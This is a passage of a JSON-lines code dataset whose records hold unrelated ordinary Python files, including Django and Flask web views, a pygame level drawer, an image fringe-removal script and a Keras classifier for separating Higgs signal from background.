VehicleTrailEffects(vehicle)\r\n return\r\n","sub_path":"res/scripts/client/vehicle_systems/vehicle_assembler.py","file_name":"vehicle_assembler.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549288624","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('subscriptions', '0011_auto_20151201_1936'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='recurly_plan_code',\n field=models.CharField(validators=[django.core.validators.RegexValidator(regex='(?i)[a-z0-9@\\\\-_\\\\.]')], unique=True, help_text='Used to uniquely identify the product in recurly.', verbose_name='Recurly Plan Code', blank=True, max_length=50),\n ),\n 
]\n","sub_path":"subscriptions/migrations/0012_product_recurly_plan_code.py","file_name":"0012_product_recurly_plan_code.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650162474","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.template import RequestContext\n\nfrom enemygen.models import EnemyTemplate, Setting, Ruleset, EnemyTemplate, Race, Weapon\nfrom enemygen.views_lib import get_setting, get_ruleset, get_context, get_enemies, spell_list\nfrom enemygen.views_lib import get_enemy_templates, combat_styles, is_race_admin\n\ndef index(request):\n setting = get_setting(request)\n ruleset = get_ruleset(request)\n context = get_context(request)\n context['templates'] = get_enemy_templates(ruleset, setting, request.user)\n return render(request, 'index.html', context)\n \ndef generate_enemies(request):\n if not request.POST:\n return redirect('index')\n context = get_context(request)\n context['enemies'] = get_enemies(request)\n return render(request, 'generated_enemies.html', context)\n\ndef select_setting_ruleset(request):\n if request.POST:\n setting_id = int(request.POST.get('setting_id', 1))\n request.session['setting_id'] = setting_id\n return redirect(index)\n\n@login_required\ndef edit_index(request):\n context = get_context(request)\n context['enemy_templates'] = EnemyTemplate.objects.filter(owner=request.user)\n context['edit_races'] = Race.objects.filter(owner=request.user)\n context['race_admin'] = is_race_admin(request.user)\n return render(request, 'edit_index.html', context)\n \ndef enemy_template(request, enemy_template_id):\n context = get_context(request)\n template = 'enemy_template.html'\n context['et'] = EnemyTemplate.objects.get(id=enemy_template_id)\n if context['et'].owner != request.user and request.user.username != 'admin':\n template = 'enemy_template_read_only.html'\n context['weapons'] = {}\n context['weapons']['1h'] = Weapon.objects.filter(type='1h-melee')\n context['weapons']['2h'] = Weapon.objects.filter(type='2h-melee')\n context['weapons']['ranged'] = Weapon.objects.filter(type='ranged')\n context['weapons']['shields'] = Weapon.objects.filter(type='shield')\n context['theism_spells'] = spell_list('theism', enemy_template_id)\n context['folk_spells'] = spell_list('folk', enemy_template_id)\n context['sorcery_spells'] = spell_list('sorcery', enemy_template_id)\n context['combat_styles'] = combat_styles(enemy_template_id)\n return render(request, template, context)\n \n@login_required\ndef race(request, race_id):\n context = get_context(request)\n context['race'] = Race.objects.get(id=race_id, owner=request.user)\n return render(request, 'race.html', context)\n\n@login_required\ndef create_race(request):\n rc = Race.create(owner=request.user)\n return redirect(race, rc.id)\n\n \n@login_required\ndef ruleset(request, ruleset_id):\n context = get_context(request)\n context['ruleset'] = Ruleset.objects.get(id=ruleset_id)\n return render(request, 'ruleset.html', context)\n\n@login_required\ndef create_enemy_template(request):\n setting = get_setting(request)\n ruleset = get_ruleset(request)\n race_id = int(request.POST.get('race_id'))\n if race_id == 0:\n return redirect(edit_index)\n race = Race.objects.get(id=race_id)\n et = EnemyTemplate.create(owner=request.user, setting=setting, ruleset=ruleset, 
race=race)\n return redirect(enemy_template, et.id)\n\n@login_required\ndef delete_template(request, template_id):\n context = get_context(request)\n try:\n et = EnemyTemplate.objects.get(id=template_id, owner=request.user)\n except EnemyTemplate.DoesNotExist:\n et = None\n context['et'] = et\n if request.POST:\n answer = request.POST.get('answer')\n if answer == 'Yes':\n et.delete()\n return redirect(edit_index)\n elif answer == 'No':\n return redirect(enemy_template, template_id)\n return render(request, 'delete_template.html', context)\n \n@login_required\ndef clone_template(request, template_id):\n et = EnemyTemplate.objects.get(id=template_id)\n new = et.clone(request.user)\n return redirect(enemy_template, new.id)\n \n@login_required\ndef apply_skill_bonus(request, template_id):\n et = EnemyTemplate.objects.get(id=template_id)\n if request.POST:\n et.apply_skill_bonus(request.POST.get('bonus'))\n return redirect(enemy_template, et.id)\n \n@login_required\ndef delete_race(request, race_id):\n context = get_context(request)\n try:\n rc = Race.objects.get(id=race_id, owner=request.user)\n except Race.DoesNotExist:\n rc = None\n context['race'] = rc\n if request.POST:\n answer = request.POST.get('answer')\n if answer == 'Yes':\n rc.delete()\n return redirect(edit_index)\n elif answer == 'No':\n return redirect(race, race_id)\n return render(request, 'delete_race.html', context)\n \ndef instructions(request):\n context = get_context(request)\n return render(request, 'instructions.html', context)\n","sub_path":"enemygen/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104373621","text":"import sys\nimport random\nimport math\nimport os\nimport getopt\nimport pygame\nfrom socket import *\nfrom pygame.locals import *\n\nWIDTH = 1280\nHEIGHT = 680\n#global vars for dimensions\nFPS = 30\n# frames per second setting\nWHITE = (255, 255, 255)\n#define colors\n\nclass Level:\n def set_block(self, path):\n self.block = pygame.image.load(path).convert()\n\ndef initLevel1(level1): #make this level universal\n level1.set_block('level1/level_blocks/block1.png')\n ##do more setting up here\n #seeing what this will do\n\ndef outlineLevel(background, level):\n block1 = level.block\n b1W = block1.get_width()\n b1H = block1.get_height()\n start = [0, 0]\n background.fill(WHITE) #white for now\n background.blit(block1, (start[0], start[1]))\n for i in range(0, int(WIDTH/b1W)+1):\n background.blit(block1, (start[0]+(i*b1W), start[1]))\n background.blit(block1, (start[0]+(i*b1W), start[1]+(HEIGHT-b1H)))\n for i in range(0, int(HEIGHT/b1H)+1):\n background.blit(block1, (start[0], start[1]+(i*b1H)))\n background.blit(block1, (start[0]+(WIDTH-b1W), start[1]+(i*b1H)))\n\nif __name__ == \"__main__\":\n pygame.init()\n clock = pygame.time.Clock()\n BACKG = pygame.display.set_mode((WIDTH, HEIGHT))\n #init background\n pygame.display.set_caption('A Duck Kind of Game')\n level1 = Level()\n initLevel1(level1)\n outlineLevel(BACKG, level1)\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n pygame.display.update()\n clock.tick(FPS)\n","sub_path":"game1.py","file_name":"game1.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170352546","text":"\"\"\"\r\nPyTSL-specific exception types.\r\n\r\nAuthor: Wolfram Reinke\r\nDate: February 16, 
2016\r\n\"\"\"\r\n\r\nfrom pytsl_11_1 import TSL_GetLastError, TSL_GetLastErrorText\r\n\r\n\r\nclass PyTSLException(Exception):\r\n \"\"\"\r\n Exception subclass to distinguish regular python errors from TSL errors\r\n \"\"\"\r\n def __init__(self, message=\"\"):\r\n self.message = message\r\n\r\n def __str__(self):\r\n return \"PyTSL error: \" + str(self.message)\r\n\r\n\r\nclass TSLException(PyTSLException):\r\n \"\"\"\r\n An exception caused by an error in TSL.\r\n\r\n When created, a TSLException automatically retrieves the last error code\r\n and error message from TSL. In addition, the user can specify their own\r\n message to clarify the context, the exception was thrown in.\r\n \"\"\"\r\n\r\n def __init__(self, user_message=None):\r\n self.user_message = user_message\r\n self.tsl_errcode = TSL_GetLastError()\r\n\r\n if not self.tsl_errcode == 0:\r\n self.tsl_message = TSL_GetLastErrorText()\r\n else:\r\n self.tsl_message = None\r\n\r\n def __str__(self):\r\n result = \"TSL error \"\r\n if not self.tsl_errcode == 0:\r\n result += str(self.tsl_errcode)\r\n\r\n if self.user_message is None:\r\n result += \": \"\r\n else:\r\n result += str(self.user_message) + \", caused by: \"\r\n\r\n if self.tsl_message is not None:\r\n result += str(self.tsl_message)\r\n\r\n return result","sub_path":"cd/pytsl/pytsl/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"126051772","text":"from __future__ import print_function, division\r\nimport sys\r\nsys.path.append('/Users/banano/Documents/PythonUtils')\r\n\r\nimport numpy as np\r\nimport databandit\r\n#import databandit.variables as dbv\r\nimport databandit.functions as dbf\r\nimport h5py\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.linalg import pinv, lu, solve\r\nfrom sklearn.linear_model import Lasso\r\n\r\n__author__ = 'dimitris'\r\n\r\ndef fringeremoval(img_list, ref_list, mask='all', method='svd'):\r\n\r\n nimgs = len(img_list)\r\n nimgsR = len(ref_list)\r\n xdim = img_list[0].shape[0]\r\n ydim = img_list[0].shape[1]\r\n \r\n if mask == 'all':\r\n bgmask = np.ones([ydim, xdim])\r\n # around 2% OD reduction with no mask\r\n else:\r\n bgmask = mask\r\n \r\n k = (bgmask == 1).flatten(1)\r\n \r\n # needs to be >float32 since float16 doesn't work with linalg\r\n \r\n R = np.dstack(ref_list).reshape((xdim*ydim, nimgsR)).astype(np.float32)\r\n A = np.dstack(img_list).reshape((xdim*ydim, nimgs)).astype(np.float32)\r\n \r\n # Timings: for 50 ref images lasso is twice as slow\r\n # lasso 1.00\r\n # svd 0.54\r\n # lu 0.54\r\n \r\n optref_list = []\r\n \r\n for j in range(A.shape[1]):\r\n \r\n if method == 'svd':\r\n b = R[k, :].T.dot(A[k, j])\r\n Binv = pinv(R[k, :].T.dot(R[k, :])) # svd through pinv\r\n c = Binv.dot(b)\r\n # can also try linalg.svd()\r\n \r\n elif method == 'lu':\r\n b = R[k, :].T.dot(A[k, j])\r\n p, L, U = lu(R[k, :].T.dot(R[k, :]))\r\n c = solve(U, solve(L, p.T.dot(b)))\r\n \r\n elif method == 'lasso':\r\n lasso = Lasso(alpha=0.01)\r\n lasso.fit(R, A)\r\n c = lasso.coef_\r\n \r\n else:\r\n raise Exception('Invalid method.')\r\n \r\n optref_list.append(np.reshape(R.dot(c), (xdim, ydim)))\r\n \r\n return optref_list\r\n \r\n#%% Run example\r\n# first load images\r\n \r\nfolder = '/Users/dimitris/BT Sync/DT_JQI/Eigenface_LASSO/Data/2014/December/04/'\r\nfilename = 'Flea3_04Dec2014_0070.ibw'\r\n\r\nprobe_list = []\r\n\r\n# little improvement on the fit when using >20 probe pictures\r\n\r\n# create a 
list of all probe pics\r\nwith h5py.File('Data_04Dec2014_0068_0119.h5', 'r') as f:\r\n for idx in range(70, 110):\r\n probe_list.append(f['/data/{:d}/image'.format(idx)][:, :])\r\n\r\n# load an image to fit to\r\nimg = dbf.loadfile(folder + filename)\r\nimg_raw = [img['Raw'][0]]\r\nimg_od = img['OptDepth']\r\n\r\n#%% call the function and plot the output\r\n\r\noptref = fringeremoval(img_raw, probe_list)\r\n\r\nod_opt = -np.log(((img_raw[0] < 1) + img_raw[0]) / (\r\n (optref[0] < 1) + optref[0]))\r\n\r\n# compare with od calculated in qgasfileio\r\nplt.imshow(img_od)\r\nplt.figure()\r\nplt.imshow(od_opt)","sub_path":"uWaves/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"45251265","text":"from subprocess import Popen, PIPE, check_output\nfrom contextlib import ExitStack\nfrom common_tools.gzip_opener import *\n\nfname='/home/stephen/x_db/DBuck/s_richer/stephen_test/projects/hic_analysis/raw_data/HB2_CL4-1-R1.fastq.gz'\ntry:\n with ExitStack() as stack:\n p1 = stack.enter_context(\n Popen(['zcat', '-f', fname], stdout = PIPE))\n p2 = stack.enter_context(\n Popen(['wc', '-l'], stdin = p1.stdout, stdout = PIPE))\n nlines, error = p2.communicate()\nexcept FileNotFoundError:\n with smart_open(fname) as f:\n nlines = sum(1 for line in f)\n \nprint(int(nlines))\n","sub_path":"src/pyFastQTools/count_lines.py","file_name":"count_lines.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"354711204","text":"# Futures #\nfrom __future__ import division\n\n# Built-in modules #\n\n# Internal modules #\nfrom gefes.common.autopaths import AutoPaths\nfrom gefes.common.cache import property_cached\n\n# Third party modules #\nimport pandas\nfrom sklearn import cluster\nfrom scipy.spatial import distance\nfrom scipy.cluster import hierarchy\nfrom sklearn.cluster import KMeans\n\n###############################################################################\nclass Clusterer(object):\n \"\"\"Recieves the matrix detailing all information for every contig,\n and is responsible for deciding which contigs go together.\"\"\"\n\n all_paths = \"\"\"\n /lorem.txt\n \"\"\"\n\n def __repr__(self): return '<%s object of %s>' % (self.__class__.__name__, self.parent)\n\n def __init__(self, pool):\n # Save parent #\n self.parent, self.pool = pool, pool\n # Auto paths #\n self.base_dir = self.parent.p.clustering\n self.p = AutoPaths(self.base_dir, self.all_paths)\n self.kmeans = GefesKMeans(self)\n self.min_length = 0;\n self.max_freq = 0;\n \n def run(self):\n pass\n\n def frame_filter(self):\n temp_frame = self.parent.frame\n if(self.min_length):\n temp_frame = temp_frame[temp_frame.length > self.min_length]\n if(self.max_freq):\n good_ones = temp_frame[[c for c in temp_frame if \"freq\" in c]].apply(lambda x: sum(x>self.max_freq)!=0,1)\n temp_frame = temp_frame[good_ones]\n tetras = temp_frame[[c for c in temp_frame if \"freq\" in c]]\n covers = temp_frame[[c for c in temp_frame if \"freq\" not in c and c!=\"length\"]]\n names = [f[0] for f in temp_frame.itertuples()]\n return (names,tetras,covers)\n\n \n###############################################################################\nclass GefesKMeans(object):\n \"\"\"Receives the matrix and uses kmeans to cluster it in N different (linearly separated) clusters\"\"\"\n\n def __init__(self,parent,number_clusts=8):\n 
self.number_clusts=number_clusts\n self.parent = parent\n\n @property_cached\n def algorithm(self):\n return KMeans(self.number_clusts)\n\n @property_cached\n def tetras_clusters(self):\n (names,tetras,covers) = self.parent.frame_filter()\n return self.algorithm.fit_predict(tetras)\n\n @property_cached\n def coverage_clusters(self):\n (names,tetras,covers) = self.parent.frame_filter()\n return self.algorithm.fit_predict(covers)\n\n \n","sub_path":"gefes/helper/clusterer.py","file_name":"clusterer.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356326972","text":"#!/usr/bin/env python\n\"\"\"\nTrain MLP classifer to identify vector-boson fusion Higgs against background\n\"\"\"\n__author__ = \"Sid Mau, Doug Schaefer\"\n\n###############################################################################\n# Import libraries\n##################\ntraining_name='_test'\n\n# Tensorflow and Keras\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, LSTM\n#from keras import optimizers\n#from keras import regularizers\nimport keras.backend as K\nfrom custom_loss import *\n# Scikit-learn\nimport sklearn.metrics as metrics\n#from sklearn.metrics import classification_report, average_precision_score, precision_recall_curve, confusion_matrix\nfrom sklearn.model_selection import train_test_split, StratifiedKFold\nfrom sklearn import preprocessing\nfrom sklearn.utils import class_weight\n#from keras.wrappers.scikit_learn import KerasClassifier\n#from sklearn.model_selection import GridSearchCV\n\n# Scipy\nfrom scipy import stats\nimport numpy as np\nimport numpy.lib.recfunctions as recfn\n\n# Matplotlib\nimport matplotlib;matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n###############################################################################\n\n###############################################################################\n# Load data\n###########\n\n# VBFH125 (signal)\nVBFH125 = np.load('VBFH125.npy')\nlabel_VBFH125 = np.ones(len(VBFH125))\nVBFH125_labelled = recfn.rec_append_fields(VBFH125, 'label', label_VBFH125)\nVBFH125_labelled['w']*=10.0 # adding weight to center the distribution\n\n# Z_strong (background)\nZ_strong = np.load('Z_strong.npy')\nlabel_Z_strong = np.zeros(len(Z_strong))\nZ_strong_labelled = recfn.rec_append_fields(Z_strong, 'label', label_Z_strong)\n\n# Z_EWK (background)\nZ_EWK = np.load('Z_EWK.npy')\nlabel_Z_EWK = np.zeros(len(Z_EWK))\nZ_EWK_labelled = recfn.rec_append_fields(Z_EWK, 'label', label_Z_EWK)\n\n# ttbar (background)\nttbar = np.load('ttbar.npy')\nlabel_ttbar = np.zeros(len(ttbar))\nttbar_labelled = recfn.rec_append_fields(ttbar, 'label', label_ttbar)\n\n# W_strong (background)\nW_strong = np.load('W_strong.npy')\nlabel_W_strong = np.zeros(len(W_strong))\nW_strong_labelled = recfn.rec_append_fields(W_strong, 'label', label_W_strong)\n\n###############################################################################\n\n###############################################################################\n# Concatenate and shuffle data\n##############################\n\ndata = np.concatenate([VBFH125_labelled, Z_strong_labelled])\n#data = np.concatenate([VBFH125_labelled, Z_strong_labelled, ttbar_labelled, W_strong_labelled])\nnp.random.shuffle(data) # shuffle 
data\n\n###############################################################################\n\n###############################################################################\n# Select variables\n##################\n\n##COLS = ['jj_mass', 'jj_deta', 'jj_dphi', 'met_tst_et', 'met_soft_tst_et', 'jet_pt[0]', 'jet_pt[1]']\n#COLS = ['jj_mass', 'jj_deta', 'jj_dphi', 'met_tst_et', 'jet_pt[0]', 'jet_pt[1]']\n#print('cols = {}'.format(COLS))\n#X = data[COLS]\n#y = data['label']\n#X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n#X_train = X_train.astype([(name, ' 0.3, 1, 0)\n#print(classification_report(y_test, y_pred_bool))\n#print(confusion_matrix(y_test, y_pred_bool))\n\n# calculate the fpr and tpr for all thresholds of the classification\ny_pred = model.predict(np.array(X_test))\nfpr, tpr, threshold = metrics.roc_curve(y_test, y_pred)\nroc_auc = metrics.auc(fpr, tpr)\n\n# plot ROC curve\nplt.figure()\nplt.fill_between(fpr, 0, tpr, facecolor='b', alpha=0.3, label='AUC = {:0.3f}'.format(roc_auc), zorder=0)\nplt.plot([0, 1], [0, 1], c='gray', lw=1, ls='--', zorder=1)\nplt.plot(fpr, tpr, c='b', lw=2, ls='-', label='ROC Curve', zorder=2)\nplt.legend(loc='upper left')\nplt.xlim([0, 1])\nplt.ylim([0, 1])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver Operating Characteristic (ROC)')\nplt.savefig('ROC'+training_name+'.pdf', bbox_inches='tight', rasterized=False)\nplt.close()\n\n## plot PR curve\n#average_precision = average_precision_score(y_test, y_pred)\n#print('Average precision-recall score: {0:0.2f}'.format(average_precision))\n#\n#precision, recall, _ = precision_recall_curve(y_test, y_pred)\n#\n#plt.figure()\n#plt.fill_between(recall, precision, alpha=0.2, color='b')\n#plt.xlabel('Recall')\n#plt.ylabel('Precision')\n#plt.ylim([0.0, 1.05])\n#plt.xlim([0.0, 1.0])\n#plt.title('2-class Precision-Recall curve: AP={0:0.2f}'.format(average_precision))\n#plt.savefig('PR'+training_name+'.pdf', bbox_inches='tight', rasterized=False)\n#plt.close()\n\n# score predictions\nscore_train = np.concatenate(model.predict(np.array(X_train)))\nscore_test = np.concatenate(model.predict(np.array(X_test)))\nprint('KS test for score_train/score_test: {}'.format(stats.ks_2samp(score_train, score_test)))\n\n# define sig/bkg regions\nsig_train = (y_train == 1)\nsig_test = (y_test == 1)\nbkg_train = (y_train == 0)\nbkg_test = (y_test == 0)\n\n# select sig/bkg for train/test and weights\nsignal_train = score_train[sig_train]\nwsignal_train = w_train[sig_train]\nsignal_test = score_test[sig_test]\nwsignal_test = w_test[sig_test]\nbackground_train = score_train[bkg_train]\nwbackground_train = w_train[bkg_train]\nbackground_test = score_test[bkg_test]\nwbackground_test = w_test[bkg_test]\n\n# make histograms\nnbins = 51\nbins = np.linspace(0, 1, nbins)\nsignal_train_counts, edges = np.histogram(signal_train, bins=bins, density=False, weights=wsignal_train)\nsignal_test_counts, edges = np.histogram(signal_test, bins=bins, density=False, weights=wsignal_test)\nbackground_train_counts, edges = np.histogram(background_train, bins=bins, density=False, weights=wbackground_train)\nbackground_test_counts, edges = np.histogram(background_test, bins=bins, density=False, weights=wbackground_test)\nwidth = np.diff(edges)\nsignal_train_hist = signal_train_counts / np.sum(np.multiply(signal_train_counts, width))\nsignal_test_hist = signal_test_counts / np.sum(np.multiply(signal_test_counts, width))\nbackground_train_hist = background_train_counts / 
np.sum(np.multiply(background_train_counts, width))\nbackground_test_hist = background_test_counts / np.sum(np.multiply(background_test_counts, width))\n\nsignal_test_std = np.array([np.sqrt(np.sum((wsignal_test[np.where(np.digitize(signal_test, edges)-1==nbin)[0]])**2)) for nbin in range(nbins-1)]) / np.sum(np.multiply(signal_test_counts, width))\nbackground_test_std = np.array([np.sqrt(np.sum((wbackground_test[np.where(np.digitize(background_test, edges)-1==nbin)[0]])**2)) for nbin in range(nbins-1)]) / np.sum(np.multiply(background_test_counts, width))\n\n# compute KS for sig/bkg prob\nks_signal = stats.ks_2samp(signal_train, signal_test)[1]\nks_background = stats.ks_2samp(background_train, background_test)[1]\n\n# plot output distribution\nplt.figure()\nplt.bar((edges[1:]+edges[:-1])/2, background_train_hist, align='center', width=width, edgecolor=None, facecolor='r', alpha=0.3, label='Background (train)', zorder=1)\nplt.errorbar((edges[1:]+edges[:-1])/2, background_test_hist, yerr=background_test_std, xerr=(edges[1:]-edges[:-1])/2, ecolor='r', elinewidth=1, fmt='none', label='Background (test)', zorder=2)\nplt.bar((edges[1:]+edges[:-1])/2, signal_train_hist, align='center', width=width, edgecolor=None, facecolor='b', alpha=0.3, label='Signal (train)', zorder=1)\nplt.errorbar((edges[1:]+edges[:-1])/2, signal_test_hist, yerr=signal_test_std, xerr=(edges[1:]-edges[:-1])/2, ecolor='b', elinewidth=1, fmt='none', label='Signal (test)', zorder=4)\n\nplt.text(1-0.025, 0.825, 'KS sig (bkg) prob: {:0.3f} ({:0.3f})'.format(ks_signal, ks_background), transform=plt.gca().transAxes, horizontalalignment='right', verticalalignment='top')\nplt.xlim(0, 1)\nplt.ylim(bottom=0)\n#plt.grid(zorder=0)\nplt.legend(ncol=2, loc='upper right')\nplt.xlabel('Keras ANN Score')\nplt.ylabel('Events (Normalized)')\nplt.title('Classifier Overtraining Check')\nplt.savefig('overtrain'+training_name+'.pdf', bbox_inches='tight', rasterized=False)\nplt.close()\n\n###############################################################################\n","sub_path":"Plotting/ANN/trainMLP.py","file_name":"trainMLP.py","file_ext":"py","file_size_in_byte":12874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395388161","text":"import pickle\r\nfrom flask import Flask,render_template,url_for,request\r\n\r\n# load the model from disk\r\nclf = pickle.load(open('model.pkl', 'rb'))\r\ncv=pickle.load(open('fittranform.pkl','rb'))\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n\treturn render_template('index.html')\r\n\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict(): \r\n if request.method == 'POST':\r\n query = request.form['query']\r\n data = [query]\r\n vect = cv.transform(data).toarray()\r\n my_prediction = clf.predict(vect)\r\n return render_template('result.html',prediction = my_prediction)\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"205254235","text":"from flask_pro import app\nfrom flask import render_template,redirect, url_for, flash, get_flashed_messages\nfrom flask_pro.Model import Base, User\nfrom flask_pro.forms import RegisterForm, LoginForm\nfrom flask_pro import db\nfrom flask_login import login_user, logout_user, login_required\n@app.route('/')\n@app.route('/home')\ndef home_page():\n return 
render_template('home.html')\n\n@app.route('/flask')\n@login_required\ndef flask_page():\n items = Base.query.all()\n return render_template('flask.html', items=items)\n\n@app.route('/register', methods=['GET','POST'])\ndef register_page():\n form = RegisterForm()\n if form.validate_on_submit():\n user_to_create = User(user_name=form.username.data,\n email_address=form.email.data,\n password=form.password1.data)\n db.session.add(user_to_create)\n db.session.commit()\n login_user(user_to_create)\n flash(f\"Account Created Successfully! You are now logged in as {user_to_create.user_name}\", category='Success')\n return redirect(url_for('login_page'))\n if form.errors != {}:\n for err_msg in form.errors.values():\n flash(f'There was an error with creating a user :{err_msg}', category='danger')\n\n return render_template('register.html', form=form)\n\n@app.route('/login', methods=['GET','POST'])\ndef login_page():\n form = LoginForm()\n if form.validate_on_submit():\n attempted_user = User.query.filter_by(user_name=form.username.data).first()\n if attempted_user and attempted_user.check_password_correction(attempted_password=form.password.data):\n login_user(attempted_user)\n flash(f'Success! You are logged in as: { attempted_user.user_name}', category='Success')\n return redirect(url_for('flask_page'))\n\n# else:\n# flash('Username and Password are not match! Please Try Again', category='danger')\n\n return render_template('login.html', form=form)\n\n@app.route('/logout')\ndef logout_page():\n logout_user()\n flash('You have been Logged out', category='info')\n return redirect(url_for('home_page'))","sub_path":"flask_pro/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"11426964","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor : Ntwali Bashige\nCopyright : Copyright 2019 - Ntwali Bashige\nLicense : MIT\nVersion : 0.0.1\nMaintainer : Ntwali Bashige\nEmail : ntwali.bashige@gmail.com\n\"\"\"\n\nfrom common.operations import OpCode\n\nclass Bytecode(object):\n \"\"\"Array of bytes representing the compiled code\n \n This class holds an array that contains the bytes representing the compiled program.\n We may write this array to a file and allow any other program to read and interpret its content.\n\n Attributes:\n code (bytearray): An array holding integers of bounded between 0 and 255.\n\n Note:\n - Think about implementing a buffered append so that we do not need to append a single byte at a time.\n - Add method to load bytecode from a file.\n \"\"\"\n code = bytearray()\n\n def length(self):\n \"\"\"Retuns the number of bytes held in the bytecode\"\"\"\n return len(self.code)\n\n def append(self, byte):\n \"\"\"This method appends a new byte to the bytecode.\n\n As we receive new bytes, this method validates the new byte and append it to the bytecode.\n\n Args:\n byte(OpCode|int): The byte to append to the bytecode\n\n Raises:\n ValueError: If byte is not an integer between 0 and 255\n \"\"\"\n # If we are given an opcode directly but not as an integer, we convert it to an integer\n if isinstance(byte, OpCode) == True:\n byte = int(byte)\n\n # Make sure the byte is an integer\n if isinstance(byte, int) == False:\n raise ValueError(\"Invalid byte to write to bytecode: <\" + str(byte) + \">. 
Expected an integer.\")\n \n # Make sure the byte is within a bytearray limits\n if byte < 0 or byte > 255:\n raise ValueError(\"Invalid byte to write to bytecode: <\" + str(byte) + \">. Byte not within bounds.\")\n\n # Write the byte into the bytearray\n self.code.append(byte)\n","sub_path":"vm/src/common/bytecode.py","file_name":"bytecode.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"499144169","text":"# This script selects a random column from a set of columns (based on certain conditions)\n# and removes entries in the other columns. Used as part of MENE statistical analysis.\nimport csv\nimport random\n\ninputCSV = open('','rb')\noutputCSV = open('','wb')\n\nwriter = csv.writer(outputCSV)\n\nfor row in csv.reader(inputCSV):\n\n\t# All columns included in the process\n\tincludedColumns = [8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28]\n\t# Create a dictionary of columns\n\tcontent = {i: row[i] for i in includedColumns}\n\t# Remove certain columns based on a criteria - in this example, if they are not equal to one\n\tfor key, value in content.items():\n\t\tif value != '1':\n\t\t\tdel content[key]\n\t\n\t# Select random object (key, pair) from dictionary only if dictionary isn't empty\n\tif any(content):\n\t\tcolumn, value = random.choice(list(content.items()))\n\t\t# Remove selected column from dictionary\n\t\tincludedColumns.remove(column)\n\n\t\t# For values left in the dictionary, make these equal to zero in the row\n\t\tfor values in includedColumns:\n\t\t\trow[values] = 0\n\n\t\t# Write the row\n\t\twriter.writerow(row)\n\telse:\n\t\twriter.writerow(row)\n\n#close all csv's\ninputCSV.close()\noutputCSV.close()\n\n\n\n","sub_path":"Scripts/randomColumnSelectionInCSV.py","file_name":"randomColumnSelectionInCSV.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352092169","text":"list1 = [1,2,3,4,5]\nlist2 = [7,8,9,10]\nlist2.append(6)\nnew_list = list1 + list2\nprint(list2)\nprint(new_list)\n\nlang=[\"C\",\"C++\",\"Java\"]\nlang.append(\"Python\")\nprint(lang)\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"438879292","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n Created by Régis Eduardo Crestani on 05/07/2016.\n\"\"\"\nfrom django.conf.urls import url\n\nfrom . 
